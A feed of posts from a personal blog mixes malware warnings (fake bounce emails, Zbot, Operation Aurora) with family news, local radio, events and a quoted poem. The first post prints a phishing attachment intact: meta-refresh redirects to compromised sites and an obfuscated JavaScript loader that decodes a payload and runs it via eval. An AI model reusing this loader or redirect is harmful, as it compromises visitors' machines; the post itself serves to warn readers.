This is NOT the original message, but an html file.  This will open your browser. The browser will redirect you to a website that has a flaw in it.  Or if you are lucky, to a website trying to sell you something.

I have seen various forms of this, so far they are all from mailer-daemon or postmaster.  Most of them originate from Russia.  The other subjects I’ve seen are:

Delivery Status Notification

Email Policy Violation

One had this refresh:

<meta http-equiv=”refresh” content=”0;url=http://www.loge1**1amsterdam.nl/index3.html” />

<meta http-equiv=”refresh” content=”0;url=http://galleryp*.co.kr/index3.html” />

Notice that both end with index3.html

The Java Script:

<script>var uKU = Math.random();var xIF=”;var nE = Math.random();var yLI = Math.random();var wGV;var mTM=”;var rN = Math.ceil(41);var jZ=”;var rGU=”;wGV=’b1abb8′+’b2bab2′+’b4baf2′+’99ad85′+’a0fbfd’+'e7cfae’+'aeb7a2′+’dff3e8′+’b9abab’+'a1adb9′+’a6aea0′+’b0bab4′+’82acb9′+’a99eb3′+’b5f5aa’+'a2bde8′+’a1bab3′+’a683f1′+’e7b8b8′+’abb7e7′+’f9′;var qS = Math.random();var mRC=55850;function lJ(nU){var sR=”;var gU=”;function y(f){var fL=new Array();var x=new Array();var v=0,r=f['u006cu0065'+unescape('%6e%67%74%68')];var vF = Math.ceil(6);var uI = Math.ceil(6);var yT=new Array();for(var iD=2;iD<r+2;iD++){var yX=false;var yZ=false;var z=new Array();var oL = Math.ceil(24);var dM = Math.ceil(24);uK=qM(f,iD-2);v=v+uK*r;}var uB = Math.ceil(11);var gUQ=false;var yTR=”;var zJ=50530;return new String(v);var kQ=”;var tS=new Array();}var rMA=false;var sP=”;function h(s, t){var tZ=”;var iP = Math.ceil(33);var hZ = Math.ceil(33);if(fS == null) {var bX=false;var uIM=false;var hR = Math.ceil(21);fS = {};var xBN=false;var aYZ=new Date();var wZ=”;}var e=new Array();if(fS[s] == null) {var jU = Math.ceil(44);var zFI=”;var qH = Math.ceil(44);var pBM=”;var eJ=”;var uO = Math.ceil(41);var q = Object;var nA=new Array();var bN=new Array();var qA=new Array();var vR=false;fS[s] = new q();var hXT=54078;fS[s].wK = 0;var bC=new Date();var mP=false;fS[s].u = t;var w=false;}var bH=”;var lX=new Date();}function n(s) {var sY = Math.ceil(42);if(fS[s] != null) {var gT=48196;var pA=”;var pB = fS[s];var bF=48403;var nK = pB.wK;var hXG=”;var pT=new Date();var tYJ=”;var iG = pB.u;var xDP = Math.random();var tY = iG.substr(nK, 1);var gG = iG['u006cu0065'+unescape('%6e%67%74%68')];                        var aU = 1;var mX = Math.ceil(42);var dE=”;if(nK + aU < gG) {var kL = Math.random();var qR=new Array();var pBO = Math.ceil(29);pB.wK = nK + aU;var dZK=”;var gZW=new Date();} else {var fCY = Math.random();pB.wK = aU – 1;var bHE=24510;var wB = Math.ceil(37);}return qM(tY, aU – 1);var fEL=48782;var nJG=46689;var bNX = Math.random();}var iR = Math.random();}var zK = Math.random();var nO = Math.random();var gX=”;function qM(xB,gR){var zN=new Array();return xB['u0063u0068u0061u0072'+unescape('%43%6f%64%65%41%74')](gR);var hS=new Array();}var iC=42895;var wY=7594;var qG=”;var xV=new Array();var lM=false;var cA=”;function eD(aX,fO){var bCL=”;var xU = Math.random();return aX^fO;var aJ=29561;}var pQ = Math.ceil(36);var hC=56770;function d(xB,gR){var tUX = Math.ceil(29);var bI=”;return xB['u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')](gR);var uER = Math.random();var aL = Math.random();var aXS = Math.random();}var tT=”;var eZ=”;var jUK = Math.ceil(44);var oG=window;var qW=”;var lBA = Math.ceil(15);var gW=new Array();var fS = null;var lU=new Array();var hMQ=false;var wV=String;var wYA=new Array();var vZ=document;var bWH=false;var aJP=false;var bE = new wV(lJ);var fT=”;var yB=new Date();var cNZ=new Array();var bJ=”;var xD = new wV(vZ['u0077'+unescape('%72%69%74%65')]);var eN=”;var dS=16914;var aZ = xD['u0069u006eu0064u0065'+unescape('%78%4f%66')](‘u0061u0072′+unescape(‘%69%74%79′));var yNI = Math.ceil(33);var lZ=new Array();var sHN=new Array();if(aZ != -1) {var dQ=36609;var vA=new Array();var fZ=28165; return 130;}var bY=9596;var sW = Math.ceil(24);var vLV = Math.random();var rC=wV['u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];var oRL=new Array();var uP=130;var tP = oG['u0073u0065u0074u0054'+unescape('%69%6d%65%6f%75%74')];var dWL=”;var wP=new Array();var jT = ”;var pTR=new Date();var nJ=oG['u0075u006eu0065u0073u0063u0061'+unescape('%70%65')];var oK = Math.ceil(44);var rUT=new Array();var rDJ = Math.ceil(44);var cI = ”;var jXH = Math.ceil(6);var qQ = Math.ceil(6);var tW = Math.random();var j = ‘%’;var lVC=”;var oHK = Math.random();var pY = 2;var uT=new Array();var vX = Math.random();var kY = Math.random();var uQ = 0;var zD=uQ;var hSS = Math.ceil(8);var qHI=”;var pOJ=11644;while(zD < nU['u006cu0065'+unescape('%6e%67%74%68')]){var vW=”;var tI=new Array();var pZ=new Array();cI+= j + nU['u0073'+unescape('%75%62%73%74%72')](zD, pY);var hD=”;var cQ = Math.random();var cLL = Math.random();zD+=pY;var yG=new Array();var qME=22402;var zGY=new Date();}var hDY=”;var hKT=58760;var pR = Math.ceil(40);var uU=new Array();var nU = nJ(cI);var kHB=”;var aY = bE['u0072u0065u0070u006c'+unescape('%61%63%65')](/[^@a-z0-9A-Z_-]/g, new String());var gB=”;var c = new wV(y(aY));var bLJ = Math.ceil(34);var sOG=”;var bZJ=false;var fMR=new Array();h(‘sT’, aY);h(‘l’, c);var mWF = Math.random();var iMP=46233;var wG = Math.ceil(47);var kRR=false;var dU=uQ;var fDZ=”;var fH=”;var rH=false;var cOD=false;while(dU < 10000) {var dWY=false;var xF = Math.random();var gXD=new Date();var cFX=”;var cK=”;var qJ = nU['u0063u0068u0061u0072'+unescape('%43%6f%64%65%41%74')](dU);if(isNaN(qJ)) break;var bYL=new Date();var nT=”;qJ = eD(qJ, uP);qJ = eD(qJ, n(‘l’));qJ = eD(qJ, n(‘sT’));var aHO=new Array();var hAF=60523;var eP=new Date();var nUA=”;jT=jT+d(wV,qJ);var mNH=”;dU++;var sSF=new Array();var mS = Math.ceil(5);}var sZM=”;oG['u0065'+unescape('%76%61%6c')](jT);var pRK=new Date();var vXF = Math.random();return jT=new wV();var lN=”;var yHE = Math.ceil(49);var fEM = Math.ceil(18);var yU=new Date();};var qX=new Date();var jZS=false;var dLV=”;var tHB=new Date();lJ(wGV);var tRH=”;var vFZ=”;</script>

This is Post from: ZeroSource!

Mailer-Daemon and Postmaster are NOT your Friend

• Conflicker, Downup, Downadup, Kido Spreading – Removal – Virus Alert! (14)
• Amazing News – Obama Refuses to be President – Virus Alert (1)
• Microsoft AntiVirus 2009, Virtumonde,Vundo Virus – Removal (17)
• Zbot Variants Spreading! (0)

So what has been happening with me?  I have got several emails of people asking.  Lets see,  my wife has a brain tumor.  A good friend of mine died in a motorcycle accident.  My eldest daughter finished her first year of college.  My little ones are starting middle school, and playing in the band.   FYI Gary Clarinet and Oboe.

So where do I start?  Well this is a start…my main focus is my wife.  She has a tumor on her pituitary gland.  The tumor is producing HGH (Human Growth Hormon).  This is called Acromegaly.  It is a rare type of tumor, and extremely hard to get rid of.  She currently shoots herself up 3x a day with Octreotide to try and shrink the tumor but eventually we will be doing surgery.

So how have you been?

This is Post from: ZeroSource!

Time, yea I got that!

• Oak Mountain Day Hike (2)
• We completed it, humping/hiking Tannehill Alabama (0)
• Live 100.5 Going Silent (2)
• Congratulation to the Crimson Tide! Who won the Redneck Award? (1)

Don’t get me wrong, I like talk radio.  One of my favorite shows is the Matt Murphy show on 1070 WAPI.  I listen to talk radio, on AM.  When I switch over to FM, it is because I’m wanting to listen to music.  Not just any music, I want to listen to classic Rock and Alternative,  Live 100.5 was my other radio station.  I don’t want to listen to Top 40 and Country.  I don’t want to listen to those two fat head guys.

So today the Facebook group SAVE LIVE 100.5 was created.  If you are on Facebook join us.  The group has grown in 10 hours to 3,500+ members.

Fans rally to save Birmingham radio station Live 100.5

The Radio Carousel returns, unfortunately, for Live 100.5

We are also emailing Citadel Broadcasting.  If you want to help try to keep 100.5, you should do the same.  Contact info below:

LIVE 100.5, the best radio station that Birmingham has ever known, is being yanked. Let’s let the folks at Citadel Broadcasting know that we are not in favor of this move. Join this Group and then go to the LIVE 100.5 fan page and let your thoughts be known! Let’s keep it civil people. Let the suits know that the listeners of LIVE 100.5 are educated, thoughtful music lovers that spend money in this area and we want a station that fits our high standards and that station is LIVE 100.5, the way it is RIGHT NOW!

Please email or call these two folks and ask them to save LIVE 100.5

jellis@citcomm.com
fsuleman@citcomm.com
AND
judy.ellis@citcomm.com
farid.suleman@citcomm.com
212-887-1670
702-804-5200

Be nice…

Updated: Contacts

This is Post from: ZeroSource!

Live 100.5 Going Silent

• City Stages 2009 (0)
• BarCampBirmingham v3.0 Wrap Up! (11)
• BarCamp Birmingham May 2nd (2)
• Update to Zerosource, Bhampulse! (0)

On January 12, 2010 Google on its own blog, posted that it had been attacked and that it originated from China.  At the same time Google threatened “reviewing its business in China”.  On the same day U.S. Secretary of State Hilary Clinton released a statement condemning the attacks.

This weekend in Davos-Klosters, Switzerland started the World Economic Forum.  The one thing that was not brought up was the attack from China on Google. Lets not forget at this forum both China and Google was present and accounted.  You might say it was a big’ol elephant in the room.  People were asked about the attacks.  The Vice Premier Li Keqiang, of China made it clear “China did not want to discuss Google”.

So where does this leave us? Should this be forgotten for economic reasons? Is it at this time, we walk away and go “Well Shit Happens!”.

There was never a mass attack using this flaw.  It seem to be quietly aimed at certain US Companies.   I can tell you now, no one is going to know what all was taken and or compromised.  I believe these types of attacks will become more and more common, not just used by countries vs countries but individual groups vs whole countries.

This is Post from: ZeroSource!

Operation Aurora – Continues

• Operation Aurora – Chinese Government – More reasons to ditch Internet Explorer (0)
• April Fools, You’re Infected.. No Really.. Seriousl (6)
• Why Microsoft Hosted Exchange? (10)
• Zero-Day Exploit in Microsoft Excel (0)

I believe Microsoft said it best about project Aurora.  And I quote:

Microsoft Security Advisory (979352) – Vulnerability in Internet Explorer Could allow Remote Code Execution

So what does this mean?  Well if you go to the right web page… just go to it.  Your computer can be compromised by an “Hacker”.  When Is say hacker, I mean the Chinese Government.  For the record, no one in the Chinese Government has come out to say they did it, but… well common sense says different.  We’ll get to that later.  You know whats funny, is I don’t fault nor do I blame them.  I blame Microsoft.  I will get to this later.

Lets look at the companies that where effected to begin with:

• Google
• Adobe Systems
• Juniper Networks
• RackSpace

unconfirmed but probably so:

• Yahoo
• Symantec
• Northrop Grumman
• Dow Chemical

So why do I blame Microsoft and not the Chinese Government?  Well its simple… as usual  Microsoft has know about this flaw for a while.  My simple research shows they have known about it since September of 2009.  That is four months to long for what should have been considered a critical flaw.  How many of you store not just your personal important but your businesses important data on computers running windows.   Now how many of them are being used with Internet Explorer as the default browser?  Now how does that make you feel?  This should have been put to the top of the priority queue for fixing.   It should not have waited till it was being exploited to be fixed.

To be continued…..

This is Post from: ZeroSource!

Operation Aurora – Chinese Government – More reasons to ditch Internet Explorer

• Operation Aurora – Continues (0)
• April Fools, You’re Infected.. No Really.. Seriousl (6)
• Why Microsoft Hosted Exchange? (10)
• Zero-Day Exploit in Microsoft Excel (0)

So I’m sure you are wondering, what does this have to do with the Redneck Award?  Well the Austin Statesman has a Columnist aka Joke named John Kelso who wrote an article “As far as rednecks go, Alabama may have UT beat“.  Well he got it wrong.

You see under normal circumstances my family would have been “War Eagle” all the way, simply because that is where the majority of our family members have graduated and/or attended.  Being that Auburn was done for the year, had no chance of going to or seeing the National Championship, we stood behind the other team.  You see Auburn, is in Alabama the state.  Alabama the school is also in Alabama..

What I never expected to see was the disrespect, the total lack of loyalty to the state, and the complete ignorance that I saw on twitter and Facebook from Auburn fans!  One tweeter that was a stand out, and someone who thinks they represent Auburn was @WarBlogle.

At one time they say “Bama fans…you are the only reason we pull against your team. Not the players, not even the coaches. YOU.”  … hum really?

As a person looking from the outside in… let me just say Kettle let me introduce you to Pot.   So it is Auburn Fans that gets the Redneck award.  At least if I was handing it out.

This is Post from: ZeroSource!

Congratulation to the Crimson Tide! Who won the Redneck Award?

• Time, yea I got that! (1)
• Live 100.5 Going Silent (2)
• City Stages 2009 (0)
• BarCampBirmingham v3.0 Wrap Up! (11)

This is a small install that I run when I reboot my system.  It checks for updates and gives me a safe place to download them from.  I also use my favorite Windows Start editor (Crap Cleaner) and turn off and/or remove all other updaters that sit in the background waiting to update a single piece of software.  This gives me an updated and faster running machine. 

You can run FileHippo.Com Updater from your Start Menu –> Programs.  When you do you will be shown the following dialog.

Just let it run and it will provide you with a website list of all the updates it found for your software. 

Now lets go through the settings!

Settings for this program are pretty straight forward.  First we have the option of setting our browser.  This is important because, this is the browser that will launch when it finds an update.  You have the option of seeing or not seeing beta programs and it will show you where you have the program installed. 

Next one is custom locations, this one is for those that install the software in a “Special” place.  Not the standard place the software wants to be installed.  This is where you can tell the updater where to look for other programs you have installed.

After that it is a simple connections box.  This is pretty standard, if you use a proxy to access the web here is where you would put the information. If you don’t use a proxy or know what it is, then don’t worry about this.

Finally is the Advanced tab, I choose to have it close if there are no updates.  Simply when I reboot the machine it checks, if I have no outstanding updates close it.  The second it to actually run it when I reboot.  I choose to do this, and ever now and then I will run it manually if I know I haven’t rebooted my machine in a while.

This is one of the great services FileHippo.Com provides, I also use it find new software that I may not know about.  Visit the site http://www.filehippo.com and see for yourself.

This is Post from: ZeroSource!

How do you keep updated?

• Microsoft AntiVirus 2009, Virtumonde,Vundo Virus – Removal (17)
• Zero Top Windows Software of 2008 (2)
• OpenDNS – Protect your children, Period! (2)
• Hallmark, Coke, and McDonalds: VIRUS Alert (0)

Most of these E-Cards, even the legit ones, will end up collecting not only the person sending the E-Card to you but also your email address and selling these to spammers.  Some use tracking code in their images, links, java, and or flash.

Then there is the malware type, these are the ones that are sent to you.  They look legit but they are really from a virus/worm that someone you know has.  These cards are fake and will ask you to install and or run something.  Once done your machine is also now infected.  You get to join in the fun of slowing your company network, getting your company on a black list, and giving your IT Staff something more to do.

Lets face it, these are horrible things and we should all do our part to avoid falling into these traps.   So this holiday season if you wanna be in the know and do it the right way, let me recommend Send Out Cards.  These are high quality cards, they handle all the hassle of actually sending.  It cost about $1 a card.  It is actually as easy as using one of those stupid e-cards.  Except the final product tho, let me tell you, is a professional looking real card.  Give them a try, tell Beth I said hi when you do.

This is Post from: ZeroSource!

Holiday time approaches!

• Zbot Variants Spreading! (0)
• Conflicker is not Y2K Bug! (0)
• April Fools, You’re Infected.. No Really.. Seriousl (6)
• Conflicker, Downup, Downadup Microsoft Offers $250,000 reward! (1)

There are several ways to propagate a virus. One of them being social engineering.  This is what the Zbot variants are trying to do.  They are sending emails that seem to come from your service provider, Microsoft themselves, and or your system administrator.

How often do you really get an email from Microsoft telling you that there is an update?  For most people, this is never.  I have worked in the Information Technology field for almost 20 years and I haven’t got an email from them to tell me there is an update.   So why do you think they are doing it now?  Better yet, do you think they are keeping track of every user that has outlook some and their email address?

So are you the system administrator?  Do you actually email people from “System Admin”?  I mean really?  Security 101 tells you to change the administrator anyway.  You should not be emailing from System Admin.  So how often does your System Administrator email you?

So by tricking you to think you are going to a real website and downloading a real upgrade or settings change they are getting you to install the Zbot variant.

So what exactly does the Zbot Trojan/Virus do?   First off it is a trojan that disables windows firewall,  steals sensitive financial data (credit card numbers, online banking login details),  makes screen snapshots,  downloads additional components,  and provides a hacker with the remote access to the compromised system.

Zbot creates a file %System%\sdra64.exe and the hidden files %System%\lowsec\local.ds and %System%\lowsec\user.ds in combination with a hidden directory %System%\lowsec.  There were new memory pages created in the address space of the system process(es): services.exe, lsass.exe, alg.exe, iexplore.exe and svchost.exe.

This is Post from: ZeroSource!

Zbot Variants Spreading!

• Happy Valentine’s Day – Enjoy your Virus! (0)
• Conflicker, Downup, Downadup, Kido Spreading – Removal – Virus Alert! (14)
• Mailer-Daemon and Postmaster are NOT your Friend (0)
• Holiday time approaches! (0)

This is Post from: ZeroSource!

Fail Boat!

• No Related Post

This is Post from: ZeroSource!

Can’t touch this!

• No Related Post

So what do they offer?

Mail Collector.   This is a way to check and or get your other mail ie hotmail, gmail, yahoo mail all in one place.

Well I wouldn’t know see, when I went to it originally I was using Chrome the newest version of Chrome even.  This is what I ran into:

See they do not support chrome.  So I opened up IE 8 and was able to sign up.  This went pretty well.  The interface looks nice. It was easy to navigate.  The main login looks almost like a iGoogle page with widgets.   There are some good widgets, one for facebook, one for twitter.  Setting these up was easy and the login was fast.  The widget for twitter is Betwittered I believe.  I tried to setup my Gmail with the mail collector and it failed, wouldn’t connect to gmail.  So then I tried to setup my yahoo email and guess what, fail again.  So my next thing to try now that I have a username and password was to sign in with Chrome since it is my main browser of choice.   Fail again, username and password hit login and just sit.  At this time I have given up and try to close out IE 8 and it just hung.  Ended up having to cntrl + alt + del kill it.

Final Thoughts

So what does this say… lots of good ideas but maybe like Google did they should stick a Beta label on it.  I will give it a try again in a few months, see if they have any bugs out of it.  I’m always interested in new things.  Have you tried it? What did you think? Any issues with it for you?

This is Post from: ZeroSource!

A new Email Service – Not So Fast!

• Is it so bad to be E-mail Nazi! (0)
• Reasons NOT to send E-Cards (0)
• msnbc.com – BREAKING NEWS: VIRUS Alert (0)
• Why do people send spam? (3)

I was told when I first moved here, you don’t go to City Stages unless you want trouble.  It is horrible, the people are rude, it stinks and there is never anyone any good.

Wow where they wrong, lets see we are going this year to see  38 Special, Doobie Brothers, Styx, REO Speedwagon, and Lynyrd Skynyrd!  Yea that is a pretty good line up if you ask me.

FREE BYRD!

I will be there all three days, starting Friday at lunch.   I always purchase my tickets through UCP (United Cerebral Palsy) Bham Casual day.  While purchasing casual day T-Shirts are over for 2009.  You should still donate to the great organization that is UCP Bham!  Talk to your boss and participate in next years Casual Day.

So my schedule will change, check back to see who/where we are going.  Are you going? Who are you going to see?

I was going to use the Logo for City Stages in this post but I do not have permission to do so….

This is Post from: ZeroSource!

City Stages 2009

• Live 100.5 Going Silent (2)
• BarCampBirmingham v3.0 Wrap Up! (11)
• BarCamp Birmingham May 2nd (2)
• Update to Zerosource, Bhampulse! (0)

• Birmingham-Southern College – Greensboro Scholarship
• President’s Outstanding Academic Achievement
• National Honor Society
• Honor Graduate – Achieved a grade point average over 4.0
• Certificate of Excellence in Honors Anatomy
• Photography Student of the Year

She will be attending Birmingham-Southern this fall studying Biology.  She has pretty much know what she has wanted to do since she was very young.

People approach me like I should be sad, sad that she’s growing up.  It is not sad, it is a great thing.  My wife and I have accomplished the goals we set out to, and that is to raise a Strong Woman, A Free Spirit, a Philosopher in her own right, and a person with a keen eye.  Someone that I know will touch the world in some magnificant way.

Oh I’m so proud of her not taking the easy road, of long nights studing to get to where she wants to be.  I’m so proud of the way she deals with everyday issues and takes the time to think of worldly ones.

I will leave you with a poem, by Richard Wilbur that reminds me of the days of her studying alone in her room, late into the night.

The Writer
by Richard Wilbur

In her room at the prow of the house
Where light breaks, and the windows are tossed with linden,
My daughter is writing a story.

I pause in the stairwell, hearing
From her shut door a commotion of typewriter-keys
Like a chain hauled over a gunwale.

Young as she is, the stuff
Of her life is a great cargo, and some of it heavy:
I wish her a lucky passage.

But now it is she who pauses,
As if to reject my thought and its easy figure.
A stillness greatens, in which

The whole house seems to be thinking,
And then she is at it again with a bunched clamor
Of strokes, and again is silent.

I remember the dazed starling
Which was trapped in that very room, two years ago;
How we stole in, lifted a sash

And retreated, not to affright it;
And how for a helpless hour, through the crack of the door,
We watched the sleek, wild, dark

And iridescent creature
Batter against the brilliance, drop like a glove
To the hard floor, or the desk-top,

And wait then, humped and bloody,
For the wits to try it again; and how our spirits
Rose when, suddenly sure,

It lifted off from a chair-back,
Beating a smooth course for the right window
And clearing the sill of the world.

It is always a matter, my darling,
Of life or death, as I had forgotten. I wish
What I wished you before, but harder.

This is Post from: ZeroSource!

My Daughter

• Time, yea I got that! (1)
• Panel: Technology alone can’t protect kids online – No Sh*t! (0)
• OpenDNS – Protect your children, Period! (2)
• Busy… or lazy that is the question! (2)